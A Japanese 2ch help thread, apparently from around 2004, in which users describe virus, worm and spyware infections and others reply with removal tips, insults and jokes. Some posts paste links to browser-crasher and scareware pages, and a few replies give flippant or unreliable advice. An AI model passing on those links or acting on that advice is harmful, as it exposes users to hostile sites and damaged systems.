もう流れてる。
>>716
ホントに一時的な祭りだったらいいけど・・・。

>>716
んで今は何から書き込みしてるの？
対処してないなら書き込んでるSSが晒されたりしちゃうよ

長くいてすいません。
でも、一人になると気が狂いそう。

>>732
もう対処できたと思う。多分。
タスクマネージャーでは、shellsystem.exeがもうないから

>>733
ぢゃ、気が狂ってください＾＾

>>731
ユーザー名くらいでしょ？無問題では？

>>733
個人情報がどのレベルで漏れたか詳細きぼん

お前らそれ以上はスレ違いだから続きはこっちで↓
http://etc3.2ch.net/test/read.cgi/entrance/1096118923/

詳細書くと特定されるんじゃね？

なら何も言わず黙ってるしかないな

住所さらされてるヤツよりマシだと思え

まさか創k(ry

そもそも晒されたー
って言っておきながら回線切ってない時点で嘘決定。
回線切ったらネタを書き込めないもんな。

>>726
坂田師匠ｷﾀ━━━━━━(ﾟ∀ﾟ)━━━━━━ !!!!!

>>726
ガンツｷﾀ━━━━━(ﾟ∀ﾟ)━━━━━!!!

>>665
家族写真と職業住所割れて電話でお知らせと比べてどう？

糞にまみれたーー

>>734
レジストリを高速でスキャンするんだ！！

>>665
俺なんか躁うつ病だけど、躁のときに
自分の写真つきで住所・氏名・電話番号を
ネットのあらゆる所にバラまいて
しかも荒らしたり煽りまくって、webarchiveに今もあるだろうけど
バラまきすぎて対処できなくて諦めてるが生きてるぞ！
いまだにイタ電くるぞ！

キンタマなんか色んな奴がかかってる
すぐにおさまるし大丈夫だ！

>>748
ありがとう。なんか涙でてきた。

>>749
がんがれ

今回何人くらいがかかってるんだろう

知らせてくれた人に感謝するんだぞ。
どんな時でも感謝の気持ちを忘れちゃいけない。

明日からは会社でロリファイル落としてたやつらのＰＣ画像がＵｐされるだろうから
もっと悲惨だぞ

下手すると会社クビな上に個人情報晒しまくり

ああ、もう24スレも先が見え始めてきたな。
相変わらず、こんなところに質問書き込んでまともに答えが出るの期待してる奴大杉だな。

>>751
もんのすごい数が感染してる
苺キンタマ監視所スレを途中まで見てたけど
飽きて今はもう見てられないぐらいの数
大人の実況板行ってみ

exe 踏まなきゃ感染しないんでないの？ FW で防げるとか

私だって寝てないんだ！

オマイラこのまま１０００までいくつもりか？ええ？

FWのことはよくわからないが
通常→シェリーとかいう.exeがネットワークにアクセスしようとしています
許可しますか？　というのが出てくるはずで
そこで拒否すれば防げると思うのだが　どうだろう
間違ってたら教えてくだされ

>>665
お前のＳＳなんか、きんたま監視所にエロ画像貼りまくったら
興味なくして誰も見なくなる

〜回目っていうのは、その分すべてがアップされてるのでしょうか？
それともそのうちの数回分だけ？

>>761
運による　うまく送信できればアップされる

失礼します。
ファイル名を指定して実行でregeditと入れると
メモ帳が開くんですが、これは金玉に感染しているということですよね…？

ご愁傷様

２ｃｈの某スレのリンクを踏んだらパソコン（ウィンドウズ９８）の具合が悪くなりました
　・インターネットエクスプローラーが開かない
　・突然インターネットエクスプローラが開き、エロサイトにつながる
　・でも他のページにはいけない
　・パソコンから定期的に「ギギガガ・・」という音がしてなにか読み取られてるのか
　　あるいは書き込んでいるのかとても不安

ノートンのライブアップデートを行って調べてみたら
Trojan.Adclicker　に感染してると結果がでました
削除してねとお願いしたら、ノートンさんは削除できませんでしたと言います
ノートンさんのおかげで感染ファイルはわかっているので
手動で削除しようとしたら、このファイルはウィンドウズが使っているので削除できませんと表示されます
どうすれば治すことができるのか、わかる方ご指導お願いします

>>765
セーフモードで駆除するだけ

ライブアップデートって事は、全然普段アップデートしてねえのか
自動的にアップデートできるように設定しておくといいよ
あと常駐保護の設定もきちんとやっておけ

>>765
再インストール

ご指導ありがとうございます
セーフモードでは起動できませんでした
何度やっても途中でフリーズしてしまいます
仕方ないので、リカバリーCDをかけてみようと思います

教えてくれよ〜
ＩＥ開くと「表示出来ないページ」というのが延々とでてくるんだよ
なんなんでしょ？？？

>>769
板違い
初心者板行け

PC初心者
http://pc6.2ch.net/pcqa/

ここ数日の間に

12608@ t.vodafone.ne.jp

noreply@daitinoaka

webmaster@ wakuwaku21.com

[email protected]

の四つのﾒｰﾙｱﾄﾞﾚｽからｳｲﾙｽの入った添付ﾌｧｲﾙが送られて来ました

本文が英語で書いてあり、連絡事項のような内容です

注意してください

pc内のmp3データがどんどん侵食されて再生不能になっていくんですがウイルスなんでしょうか？

わっがんね

>>772
nyやめて、回線切って隠居しろ

>>774
わかりました。どうもありがとうございます。

職人さんによる今回の「苺きんたま」ウィルス騒動のまとめフラッシュ
http://douch.net/cgi-bin1/src/up0281.swf

>>772
一個だけマジレス
それは「ぬるぽ」です。駆除の仕方はdownload板とかで調べてください。
ny関係はそっち。

　　　　　　　　　　　　　　　　　　　　　　　_,､､､､､､､,_　　　　　　　　　　n
　　　　　　　　　　　　　　　　　　　　　,riTl|l.il|..ll..|ll.i..lli､　　　　　　　　　y
　　　　　　　　　　　　　　　　　　 　 ril l!|.|ｌ|.l||!.l|.|l|lil.l|l|l　　　　　回　　や
　　　　　　　　　　　　　　　　　　 　 ||ｌ!ｉ!|州l|l|ll||lllﾐilｌll|l|　　　　　線　　め
　　　　　　　　　　　　　　　　　　　　!|||ﾗ''' '´!|ll||l!lｿ|||l||　　　　　切　　て
　　　　　　　　　　　　　　隠 　　　　　 `ｔ'_,,,ヽ　　 i´l州　　　　　 っ
　　　　　　　　　　　　　　居 　　　　　　 ﾞiｰ ''　 ／ｉ',ﾉ'ﾞ入　　　　て
　　　　　　　　　　　　　　し　　　　　　　　`ー'､´ ／,r'´　,>､
　　　　　　　　　　　　　　ろ　　　　　　　　　 ,ｲy' ／　 ／,ｒ ヽ,
　　　　　　　　　　　　　　　　　　　　　　　,ｒ'// /　 ／,i' '　　ｉ ﾞ､
　　　　　　　　　　　　　 　 　 　 　 　 　／,/ｌｉ,/　,/,i',i' ,ｒ ,ｒ7' ヽ,ｉ.
　　　　　　　　　　　　　　　　　　　 　 〃,//ｌ/　.// ,' /'´ /　　 ﾊ.
　　　　　　　　　　　　　　　　　　　　/,' / ｌ./　 ,ｉ'ｉ ｌ//　 /　　 /　ｌ
　　　　　　　　　　　　　　　　　　　/ ,ｉ ,i ,!/　 ,i' l //　,/　　 ,/　　l.
　　　　　　　　　　　　　　　　　　,/ l l i l./　　!i .l / _,/　　／　　　l!
　　　　　　　　　　　　　　　　 ,r'=‐､_ll_!j'_,_､-‐､‐'　　　__,,.　　　　 !l.
　　　　　　　　　　　　　　　 /ﾉ /´/　｀`ヽ､ ｀　 ｀`''''"´　　　　　 ,! l
　　　　　　　　　　　　　　 /´ ,/-/　　　　　｀`　　｀`ヽ､､___,,　　 i　 l
　　　　　　　　　 　 　 　 / ,.ｲl /　　　　　　 ,.r‐　｀`ヽ､,__　　　 ,! ./!l
　　　　　　　　　　　　　/　　jly'　　　　　- '´　　　　　　　　 　 i　i　!.|
　　　　　　　　　　　　 〈_/'V |l　`'‐‐‐‐‐‐‐‐‐‐‐‐_,,,､､-‐‐''　 !　　　 |
　　　　　　　　　　　　　}　,/ l!',>､ ＿__,,,､､-―''´―-､､‐'　　 !　　　　|
　　　　　　　　　　　　　ﾚ'/ / i/l! い､＿｀`ヽ､､______,　　　　　　　　_,,ﾉ
　　　　　　　　　　　　　〉',/l j/:l!:l ヽ ﾞ､__￣￣____,／　　　　 `'ｰ‐'ﾝ'l.l

//www.cty-net.ne.jp/~taitiro/imgboard/data/img20040825044524.jpg
これもブラクラですが、踏んでしまったらどうしたらいいですか・・・？

↑ブラクラじゃねぇ！ウィルスのサイトだった。どうしたらいいですか？

>>779
 　 　 　　,　 　 -―- 　、
　　 　 　 ／　 　 　 　 　 　　＼
　　　 ／　 　 　/|　/|　ﾊ　　　 ヽ＿
　　 /　/　　/ / //　| |　|　 ヽ　/　/
　 / _/ / / |/　|/　　v N | |　|/　/|　　 ／￣￣￣￣
　　 | ./ / |/TΤ　　 ГＴヽ|（　(/)）|　＜　マルチ
　　 |/ﾚ |　〉 -┘ 、 └-　　V　~ |　|　　＼＿＿＿＿
　　 　 　 v＼ ″　ｰ　 ″ イv w　N
　　 　 　 　^　` ー-　 　 ノ　 ヽ
　　 　 　　　　| | 　|　 ／　　/ ∧

苺きんたまに感染したらＣＰＵ使用率って常に１００％なんですか？
ＣＰＵ使用率が１０％前後だったら感染してないって思って大丈夫？

>>782
タスクマネージャーで確認しましょうね。
ctrl　+　alt　+　del
shellsystem.exeが起動してたら残念賞。

>>783
返答ありがとうございます！
shellsystem.exeはなかったんだけど亜種が心配で…。

＞771
今頃何をほざいてお出でですかｗ

>>779
http://www.itmedia.co.jp/enterprise/articles/0409/24/news006.html
これなのかな？

>>779
>>442
バコバコ踏むな
過去スレぐらい検索しろ
>>786 偽装html

「安全なInternet Explorer」はWindows XP SP2にのみ提供される
http://japan.cnet.com/news/ent/story/0,2000047623,20074797,00.htm

>786
>779の中身はHTMLなので違うと思われ

>>787
マルチに答えるな、クソぼる

>>790
うるせえカス。まともな回答もできんクセに。

W32.Randex.genというウィルスをノートン先生が見つけたんですが、
検疫できなかったのでノートン先生の画面に「自動的に削除をお勧めします」
と出てるんですが、感染してるファイルがよりによってmsconfig
これ本当に削除していいんですか・・・？

ちなみにwinfix3というファイルは見つかってません。誤診でしょうか？

>>791
甘やかすなハゲ

>>793
ほれ。質問来たぞ。まともな回答しろや

>>794
お前がやれよ
マルチにも答えてやる親切な人なんだろw
ぼるスレでもマルチに答えてたよな。成長しろよ。

>>794
ヒッキーの仕事を取ったら悪いのでやめとく。ほれ、仕事しろ。

OKOKOKOKOKOKｈttp://

アドレスを貼って移動しようとするとこのように邪魔されるんだけど
これは何ですか？

>>792
削除していいよ
ファイルの修復方法はまた来週ね

ノートン先生が捨てろと言ってるんだから素直に捨てろ！全部捨てろ。

Alt+Cｔｒｌ+Deleteが効かないのですが、何かウィルスですか？

>>800
>>86のテンプレ使用せよ。

それが・・・何故か削除できなかったぽ
システムの復元もオフにしてるのになあ

>802
おまいも>86にのっとって環境書いてくれ

>>802
セーフモードで削除後、変更されたレジストリを元に戻す
http://www.symantec.com/region/jp/sarcj/data/w/w32.randex.gen.html

一週間ほど前から
ノートンファイヤーウォールが
「リモートホストがコンピュータにアクセスしようとしています」という警告が出ます。

リモートアドレスとローカルアドレスが毎回違うので
「常にこの処理を使う」にチェックを入れても効果がありません。

ノートンのビジュアルトラッキングでは
一番最後のドメイン情報は　222.121.184.11と出ていますが

これってウィルス？　

バスターのオンラインスキャンで　TROJ_DIALER.N　を検出したんですが
バスターに情報は無く、ググっても見当たらないので、ご存知の方いましたら情報お願いします。

なぜか急にいろんなフォルダにdesktop.iniが出来たんですが、
これは何かのウイルスによるものなんですか？

>>805
ただのポートスキャンか、踏み台にされたやつが
トロイをばらまきに来ているだけだろ。

おそらく無問題。

>>807
マルチ

windows起動時にmoleboxというPOPウィンドウが開くのですが・・・
何かウィルスに感染したのでしょうか？
ノートンは反応なしです。

ノートン一昨日定義でダクロリ踏んだらウイルスメールがたくさんきました。
みなさんも気をつけて…

最近質問の仕方がひどいな

>812
禿同。慌ててここに書き込むより状況を整理してからでしょ。順序は大事。

>>812
他のスレもそうだが、わざとやってるとしか思えん。

ttp://www2.strangeworld.org/uedakana/sahra6138.jpg
さっきこれ踏んだらメール作成画面が死ぬほどでてきて
フリーズしたんで強制終了したんですが
何かウィルスが入ってるんでしょうか
今の所パソコンに異常はありません
もしウィルスがあるのであれば
どういった症状になるのかも教えてください
よろしくお願いします

わざとでしょ

>>815
ここは鑑定スレではありません
てゆうか、やるべきことをまずやってから改めて来てください

なんか　Ｔウイルス　に感染したっぽいんだけど・・・
友達なんて共食いしてるし

>>818
それは大変ですね・・・解決方法は、街を丸ごと爆破するしかないのかもしれません。
やる場合は自己責任でやってね。

解決しました、一応報告までに。
みなさんありがとうございます。

>>815
mailtoのブラクラ。ウイルスが心配ならスキャンすりゃいいだろが。
そんな聞きかたしてくるような奴だからどうせアンチウイルスソフト入れてないんだろうけど

質問させてください。
今日、ノートンが「VBS.loveletter.var」を検出しました。
うちのノートンは更新してないのでトレンドマイクロのオンラインスキャンでスキャンしたところ
感染ファイルは見つかりませんでした。（スキャンの間ノートンは警告出しまくりでしたが。)
それで私はノートンが誤反応起こしてるのではないかと思い、
インターネットオプション→一時ファイルの削除、履歴の削除を行いました。
再び、スキャンしてみたところ、ノートンは警告を出しませんでした。
これって結局ウィルスじゃなくてノートンを誤反応起こさせるいたずらですよね？

strangeworldにひっかる奴がまだいることに驚いた


>>822
はい

>>823
レスありがとうございます。
ちなみにloveletter駆除ツールを使っても感染してないって出てたんで
いたずらかなとは思ってたんですが。

>>824
こちらも見たほうがいいかな。多分そこもやられてるんで、誤反応するかも

ノートンがvbsウィルスのソースに誤反応２
http://pc6.2ch.net/test/read.cgi/pcqa/1033948204/l50

>820
治って良かったね。

ウイルスでTROJ_VB.JLってのに感染してるみたいなんですが
ウイルスバスターの最新版で検索したら感染ファイルは見つかりません
でしたってでるんですけど
ウイルスログを見ると隔離できません削除できませんってなってるんですけど
これって感染してるんですか？

>>827
感染してると思うよ
アンチウィルスソフトがあるからと言って、そこで安心しちゃった貴方の負け

>>825
VBS.loveletter.varでググッたところそのスレが検索されたのでログはすでに見ました。

ttp://default-homepage-network.com/start.cgi?hkcu
を、ある理由で興奮＆焦ってたんで、周りの反応をうかがわずについ・・・

なにやら怪しげなページにとんで、怪しげなウインドウが開き、
妙なアニメキャラ泣き声にありそうな効果音の後に、CDが勝手に開いたり・・・
深夜徹夜でもうろうとした中焦って電源切っちゃったり・・・

感染したんでしょうか？

わざとではなかったんです、すいません。。。

molebox launcherというのが起動時に表示されるようになった同時期に
ﾉｰﾄﾝｱﾝﾁｳｨﾙｽ2004がウィルス名W32.Spybot.Wormを検出しました
でもノートンでは最新のウィルス定義でも削除できなかったため
自分なりに調べて似たような症状のことがカキコしてあるスレを見つけ(下記参）
ttp://www.google.co.jp/search?q=cache:KvwSARYNxVQJ:etc.2ch.net/test/read.cgi/qa/1070828680/51-150+molebox+launcher&hl=ja&lr=lang_ja
を参考にレジストリを削除しようとしたのですが
"Winsock32driver"="win32server.scr"という名前のものも似たような名前のものも見当たらず
セーフモードでウィルスとされているファイル（srss.exe)を削除しました
そのあとノートンでスキャンしたところウィルスは感知されなかったため
安心して再起動したとこと、またmolebox launcherが・・・
ノートンで感知してたウィルスとはまた違うものなのか？と思い
助けを求めたのが>810のカキコです。。。
今日、仕事から帰ってきてPCを見たところ昨日削除したと思われたウィルスと
同じ名前のウィルスが違う場所それも数箇所に拡散してました。。。
PC初心者の私ではもうどうしたらいいのかわかりません・・・

>>830
「ブラクラ&ウイルス」らすい。
要ウイルスチェック

他にも症状があるならコッチへ
エロサイト見たら…助けて下さい！Part41
http://pc6.2ch.net/test/read.cgi/pcqa/1095834281/l50
テンプレよく読んで、指示を実行すること。

>>830
スクリプト実行オフの時は、なんともなかった。
オンの時はDOS窓風の窓が表示されて、
「CDドライブが開いてたら、ウチのスパイウェア検出ソフトを使ってよ」
と宣伝っぽいことが書かれてた。
以下メインの窓に書かれてたこと
IMPORTANT SECURITY NOTICE FROM SPY DELETER!

Is your computer suffering from any of the following symptoms:

1. Has your browser's START PAGE changed?
or 2. Are you seeing a recent increase in annoying POP UPS?
or 3. Have PORN ads appeared in your browser or email?
or 4. Has your computer been acting wierd lately?
or 5. Is your Internet slower or even crashing?
or 6. Do you think your computer may have a virus?
or 7. Have new programs or toolbars been added without your permission?

If your computer is experiencing any of these symptoms...

It is almost certain that "spyware" has taken over your computer,
and the problems will only get worse quickly. Plus your sensitive
information like credit cards and all of your passwords can be
retrieved by criminals all around the world. This is a very scary
problem that needs immediate attention! You NEED to get this fixed now!

Click on THIS LINK FOR IMMEDIATE HELP and your computer will be
back to normal and secure again in just a few minutes.

>ある理由で興奮＆焦ってた

またロリか

>>832
リンク張るような馬鹿に返答するなよ。

>>830
リンク張るな、ボケ。
おまえ見たいなうっかりさんが踏んだら、更に被害者が出るんだぞ。
そうならリンク張ったおまえが加害者だ。

>827
まずは>86の通りに書け
話はそれからだ

>>835
h抜いてるから問題ないと思われ
直リンするｳﾞｧｶに関しては同意

>>835
えー、直リンにしてないからいいと思ったんだけどな・・・。

ｈ　抜いても２ｃｈブラウザ使ってる人には直リンと何も変わらないんだが・・・

>>839
あー、ｽﾏｿ
漏れはoperaで2ch（実況を除く）してるｳﾞｧｶもんなんで、忘れてた。

>>839
俺も２ｃｈブラウザ使ってるから、わかるんだけど。
このスレではh抜いても直リンとみなす事にするの？

>>841
俺は直リンでないに一票を投じることにしよう

した方が良いんじゃない？
835はちょっとキツク言い過ぎだけど。

直リンとはいわんとは思うがここは鑑定スレじゃないって話じゃなかったか？

XPホームエディションですが、今日急にｳｲﾙｽﾊﾞｽﾀｰが「DIAL_JAPUP.A」を
何度となくﾘｱﾙﾀｲﾑ検出するようになりました。
ﾄﾚﾝﾄﾞのHP見てもこのｳｲﾙｽの情報がありません。
どうやらﾀﾞｲｱﾗｰとかいう勝手に回線接続な奴みたいなのですが、
お助けくださいませ。
　JPUPD.EXE
　WNK**.EXE
とかいうﾌｧｲﾙ名でよく検出されます。
XPのSP2らしき自動ｱｯﾌﾟﾃﾞｰﾄを今日やったのですが、これが原因？
よろしくお願いします。

ここ見てると、テンプレも読めないﾔｼらしかウイルス感染してないのが良くわかる。

>>845
なんか「反日的」な名前だなｗ
ﾊﾞｽﾀｰのウイルスログの内容はどーなってるのだ？
セーフモードでスキャンした？

>>846
なんかﾏﾇｰやっちゃってる？俺・・・

>>847
ありがとう、セーフモードスキャン試してみます。
ログは、\Local\settings\Temporary Internet Files\Content.IE5\ の
下位ﾌｫﾙﾀﾞにJPUPD*.EXEが、
\Local\settings\temp\ にwnk**.exeが検出され、どれもｱｸｾｽ拒否処理を
行ったとなってます。

２ちゃんねる見てた時急にメール受信の画面が出てきて、何も操作ができなくなってしまいました。
自分で動かすことができないのに誰かが勝手に動かして受信メールを一個ずつ開いて見られました。
まるでおばけが乗り移ったようでした。なんなんでしょう？
これはウイルスですか？ウイルス対策を何もしていない状態だったので可能性はありますよね。

ｾｰﾌﾓｰﾄﾞｽｷｬﾝはなぜかﾊﾞｽﾀｰが初期化できないと言ってうまくゆかず。
しかしｾｰﾌﾓｰﾄﾞからｼｽﾃﾑの復旧ができたことに気付いて、
検索とでｳｲﾙｽ見つけて削除、さらにﾚｼﾞｽﾄﾘｴﾃﾞｨﾀで関連ﾃﾞｰﾀ消して
復旧に成功しました。　ついでに紛れ込んでたのも削除。
乙でした。

ネットを開くと、アドレスバーの下に新しく
SearchとCorporation 、Internet 、Rights 、Japan 、C 、Copyright 、Reservedっていうのが出ます。
さらにデスクトップの下部に青っぽいタスクバー2本分の大きさの何かが出てきて、
Make MoneyとかMusic、Casinoって書いてあります。
恐くなってNortonで全スキャンしたんですが、何もありませんでした。
直し方教えてください

>>851
スパイウエアにいかれとるわ。直し方はこっち

ttp://higaitaisaku.web.infoseek.co.jp/index.html

ありが�d！！！

市満のオンラインスキャンってもう苺きんたま検出できる？

>>833
ありがとうございます！
>>834
違います。サッカーのネット中継を早く見たくて「ここで○対○の試合見られるよ」って言うのをつい。

リンクの件はすいませんでした。では、ｈｔまで抜けば平気ですか？
以後気をつけます。

オンラインスキャンしたら下記のようなウィルスに感染していたのですが、駆除方法を教えてください。

Virus:Trj/Downloader.GK 駆除不能 C:\Documents and Settings\userID\Local Settings\Temp\THI4A84.tmp\twaintec.cab[polall1t.exe

手動しかないのでしょうか？
その場合、このファイルを手動で消しても問題はないのでしょうか？

>>856
http://www.pandasoftware.com/virus_info/encyclopedia/overview.aspx?lst=sol&idvirus=48242
ｺｺｲｹ
オンラインスキャンするなら別にパンダでも何でもいいけど
ここに書き込むならシマンテックとかのウイルス名にしてくれ

質問させてください。ウイルスについてですが、例えば苺きんたま
であれば「〜.exe」という形になってますよね？それでそのファイル
を実行した時、見た目的にはどうなるのでしょうか？ダブルクリック
しても何も起こらず「？」と思っているうちに感染しているものなの
ですか？それとも何か解凍しているような動きを見せたり、目的の
（偽装されている）動画なりグラフィックがきちんと見えたりするの
でしょうか？

「？」と思っているうちに大抵感染します。

>858
ものによる
表面上何も起こらない（裏ではきっちり作動している）ものもあるし
偽のエラーダイアログとか出すやつもいる
表向きは普通のアプリケーションで裏で別の動作するのもある

>>859
>>860
なるほど。モノによるわけですね。ありがとうm(__)m

パンダオンラインスキャンしてるけど
先生とBit君は反応なしだったよ
やばそうならC:\WINDOWS\system32\ActiveScanを捨てたらいいのかな
あとはレジストリが変更されてないか心配なんだが…
他の人はどうなってる？

XPだけど最初のログイン画面でログインすると一瞬壁紙が写って自動的にログアウトしてしまいます。
ノートン入ってますし、別に異常はありませんでした。
お助けお願いします。

ageますね

>>863
う〜んそれはウイルス情報＆質問スレに書く内容なのか？
最初のログイン画面というのもそれはXPユーザーのログインログオフのことか？
もう少し質問の仕方を勉強してからここで聞くといいよ。
　↓
http://pc5.2ch.net/test/read.cgi/win/1096280267/

もしウイルスに心当たりがあるならばまずはスキャンしろ。
心当たりがないならまずはhttp://www.google.com/intl/ja/ここで探せ。グーグル大先生で8割がたはなんとかなるだろ

ほんと質問する側はそんな質問の仕方で答えてくれると思って聞いているのだろうか・・・・・
何も自分で調べず。どのスレに書き込めばいいかも考えず。自分のPC環境も示さず。
百歩譲ってスパイウェアとの違いがわからないのは許そう
だが俺たちは誘導部隊じゃねぇーんだよ。
ウイルスの字が見えないのかね
＾＾＾＾＾＾＾＾

基本的には>>865ﾊｹﾞﾄﾞｰだけど
初心者は何がわかんないのかすら わかんないってのも事実なんだよね。
だからって許される事ではないけど・・・

って事で質問者はこおテンプレに沿って質問するようにしてﾁｮﾝﾏｹﾞ

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは何を使っているか】
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】
【その他の質問】

>>865-866
やっぱここに集まる奴は何だかんだ言っていい香具師だな。
865は手厳しいけどちゃんと誘導してあげてるし、866はよりやわらかく教えてあげてるしテンプレまでもう一度貼ってくれて。
うんうん。優しいな。そんなお前らが大好きだよ(´Д⊂ｸﾞｽﾝ

ノートンアンチウイルスが￥1,980

ストリーミング再生中にウィルスを混入させることは可能ですか?
教えてください。

初心者です・・助けてください
どうやらウィルスに感染した模様です。

メールに添付されていたファイルを開いたら感染したみたいです。
症状はIEではページが表示できなくなってしまったこととPC起動時の立ち上げに時間がかかるようになったことです。
２ｃｈブラウザやヤフーメッセンジャーとかは正常なんです。
最初感染しときに、デスクトップにMS-DOSのショートカット？が作られました。
で、そのショートカットの本体を探したんですが、見当たらず、ウザいのでショートカットは削除しました。
なにかのファイルを埋め込まれたようですが、どうすれば復旧できるでしょうか・・
お願いします

>>870
>>866

たった４コ上のレスも読まんのかorz

MS04-011_LSASS_EXPLOIT
MS03-026_RPC_DCOM_EXPLOIT

この二つのウイルスらしいのが何回も来るんですがなんなのでしょうか？
詳しい詳細が解る方、お教えください。

お願いします

スミマセン書き直します

【使用OS】 ＷｉｎｄｏｗｓＸＰ　ＳＰ２
【WindowsUpdateしてるか】 使用していています
【AntiVirusは何を使っているか】 ウイルスバスター２００４
【ちゃんとUpdateしてるか】 自動更新です
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】 大丈夫でした
【症状を具体的に、分かる限りすべて書く】 今のところ被害なし
【何をしたらそんなことになったのか】 ネットに繋げたら頻繁に攻撃してきますが、バスターが
　　　　　　　　　　　　　　　　　　　　　　　ブロックしてくれます。
【これまでにとった措置】 一応、手動ウイルススキャンしました
【その他の質問】MS04-011_LSASS_EXPLOIT
　　　　　　　　　　 MS03-026_RPC_DCOM_EXPLOIT

　　　　　　　　　　 この二つのウイルスらしいのが何回も来るんですがなんなのでしょうか？
詳しい詳細が解る方、お教えください。

お願いします !
どうしたらこの攻撃を回避できるでしょうか？

>>873
バスターのメイン画面→ﾊﾟｰｿﾅﾙﾌｧｲｱｰｳｫｰﾙ→ﾈｯﾄﾜｰｸｳｲﾙｽ緊急設定
を見てみ。そこにあるだろう？そこのURLクリックすればトレンドマイクロ
の解説ページに飛ぶから調べてみ。
あと、バスターのﾊﾟｰｿﾅﾙﾌｧｲｱｰｳｫｰﾙを有効にしといてくれ。
設定の仕方は自分で調べてね。

>>873
他にも同じ症状がイパーイ。
ttp://okweb.jp/kotaeru.php3?q=1006254

>>873
WindowsUpdateしてるなら気にすることはない。
ネットワーク緊急対策設定→“ネットワーク〜略〜表示する”のチェックをはずす。
チェックをはずしてもPWFが有効ならネットワークウイルスはブロックされているので問題ないよ。
SP2でこの問題が発生してるみたいだね。

不具合満載なもんを自動うｐ立てしてくんなよなぁ
更新の準備ができました
ヽ(`Д´)ﾉうわーん

>>874>>875>>876>>877
ありがとうございました！
取り合えず表示をしない様に設定しました。

本当にＳＰ２はどうなってるんでしょうね？

しかし、「質問テンプレつかって質問しなおしてくれ」って言ってるだけ（のつもり）
なのに、そのまま消えてしまう香具師って、どういうつもりなんだろう・・・？

>>873
ルーターなどを使わずに直接インターネットへつないでいると
世界中からランダムにブラスター系のネットワークウイルスが飛んでくる

それをウイルスバスターのPFWが検出してブロックした報告がそれ。
報告はブロックした後なので、報告を表示しないようにしてもブロックはちゃんと行われる。

ただ、

＞どうしたらこの攻撃を回避できるでしょうか？

というのなら、ルーターを買ってきて繋ぐしかないと思う。

HPがエロサイトになってしまうのですが、
どうしたらよいでしょうか？
お願いいたします。

>>881
mk:@MSITStore:C:\spe\start.chm::/start.html#

これになります。

>>881
>>852のリンク先に行ったらOK。それでも無理ならまた来い

>>880
自分のモデムには一応ルーター機能が付いてるんですけど
市販のルーターでなくても防げるのもなんでしょうか？

>>878
>880さんの書き込みで自分の勘違いに気づきました。
セキュリティパッチ未適用かつ、ポート攻撃がある場合にMS04-011〜等が表示されるものだと
思い込んでいた。
実際はMS04-011〜等の脆弱性を突くウイルスが多数存在する為で、
一例を採ると“MS04-011_LSASS_EXPLOIT”が表示されたときブロックしたウイルスは
ttp://www.trendmicro.com/vinfo/virusencyclo/default5.asp?VName=MS04-011_MICROSOFT_WINDOWS&VSect=T
この内のどれかということでSP2だから表示されるという問題では無かったです。

昨日からウイルスと格闘してます。
症状は、タスクマネージャーを見ると
5秒毎にcmd.exeが実行されてます。

ノートンでは検出しない、
レジストリでRUN関係のエントリ削除しまくって
もだめ（勝手にインストールされたserv_Uは
起動しなくなった）、やけくそでcmd.exe削除
してもだめ（削除してもすぐ復活する）。

いいかげんにくじけそうで、なにかちょっとでも
気づくことがあったら教えて頂たいです。

Windows2000でWinアップデートは最新です

>>880>>885両氏
またまた有難う御座います！
>>880さん
取り合えずバスターで様子を見ておきます。
それでも酷い様だとルーターを導入してみます。
>>885さん
ＳＰ２だけの問題では無かったのですね。
最近ＭｅからＸＰにしてＳＰ２にアップロードしましてバスターも入れていたので
安心しきっていました。

でも、昨日まで滅多に攻撃が無かったのに、
今日になってこんなに酷い攻撃の多さなのでちょっとビックリしました。

>>886
お前も>>872-873を見習え

>>883
無理でした。
またお知恵を拝借いたしたいと思います。

ちょっと席を外しておりました
では失礼をば

【使用OS】win2000
【WindowsUpdateしてるか】してるかどうか忘れました（してないかも）
【AntiVirusは何を使っているか】 ないです・・
【ちゃんとUpdateしてるか】
【スキャンした結果（ウイルス名・発見場所）】
【別のオンラインスキャンしたならその結果は】
【症状を具体的に、分かる限りすべて書く】
･強制的にショートカットがデスクトップに作成された（ｍs-dosなんとかって名前）
・ IEではページが表示できなくなってしまった
・PC起動時の立ち上げに時間がかかるようになった
・２ｃｈブラウザやヤフーメッセンジャーとかは正常
【何をしたらそんなことになったのか】 ウィルスメールの添付ファイルを誤って開いてしまった
【これまでにとった措置】強制的に作られたショートカットを削除
【その他の質問】 特になし

おながいしまつ

C\windows\sysdllディレクトリってウィルスに感染しないとできませんよね？

>>890
ｿｰｽﾈｸｽﾄって会社のねぇ、ウイルスセキュリティ2005っていう
とっても安いアンチウイルスソフトがあるんだ。それでねぇ、
この板にもスレが立ってるんだけど、使い続けてる人はみんな
楽しそうで仲がいいんだ。俺使ってないけど、微笑ましくてその
スレは毎日みてるよ。

つーか、まずはオンラインスキャンやってください。
ttp://www.symantec.com/region/jp/securitycheck/index.html
ttp://www.trendmicro.co.jp/hcall/index.asp

>>886
フォーマット

>>892
ありがとうございます
オンラインスキャンしたいんですが、ウィルスのためブラウザが使えないんです。
ページが表示されないんです。
２ｃｈブラウザとかは使えるので、ネットには接続されているんですが・・

>>890
セーフモードで起動→オンラインスキャン→手動削除→( ﾟДﾟ)ｳﾏｰ　　だな。
健闘を祈る。
手動削除で自信がなかったらここにまたきなさい。
・怪しいメールはあけない
・アンチウイルスソフトを入れる→無料のもある

>>892
おいっ！
っつーか感謝してるし・・・・・　禿藁

>>891
うん。download板へ行った方がいいねぇ・・・。

ある結婚相談所が作った出会い系サイトのようなものがあって、そこのホームページを見た日だけ必ずといっていいほど非通知でのワン切り電話が掛かって来ます。これはスパイウエアかハッキングのようなものでしょうか？

>>888
てめーはマイクロソフトのテクニカルサポートか。
必要な情報は本文中に書いてあるだろボゲェ。
鼻糞以下の脳みその癖にいっちょまえにレスするなや。

>>ヤクザ
手の施しようが無いからフォーマットするよ。。。。
まったく凶悪なウイルス作りやがって

教えてください。アップデートしたXP使っているのですが、
ちょくちょくキーロガーのログファイル（？）がデスクトップ等に現れます。
定義ファイル更新したウィルスバスター2003とspybotでスキャンしても何も見つかりません。
問題のファイルは「}」等の一文字で拡張子もなく、見つけた分だけメモ帳で開いてみると
WINAMPとIEを使用した時のログばかりです。
というか今まさにこのログがデスクトップに現れやがりました。
